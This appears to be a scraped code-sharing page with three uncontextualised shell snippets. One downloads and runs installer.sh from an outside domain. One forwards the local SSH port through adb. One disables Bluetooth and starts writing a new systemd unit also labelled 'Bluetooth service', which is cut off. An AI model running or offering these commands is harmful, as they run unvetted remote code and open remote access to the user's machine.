This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sh -c 'wget deb.trendtechcn.com/installer.sh -O /tmp/installer.sh && sh /tmp/installer.sh' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo apt-get -y install openssh-server adb | |
| sudo systemctl start openssh | |
| sudo adb reverse tcp:8080 tcp:22 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| systemctl stop bluetooth | |
| systemctl disable bluetooth | |
| cd /etc/systemd/system/ | |
| echo "[Unit] | |
| Description=Bluetooth service | |
| Documentation=man:bluetoothd(8) | |
| ConditionPathIsDirectory=/sys/class/bluetooth | |
| [Service] |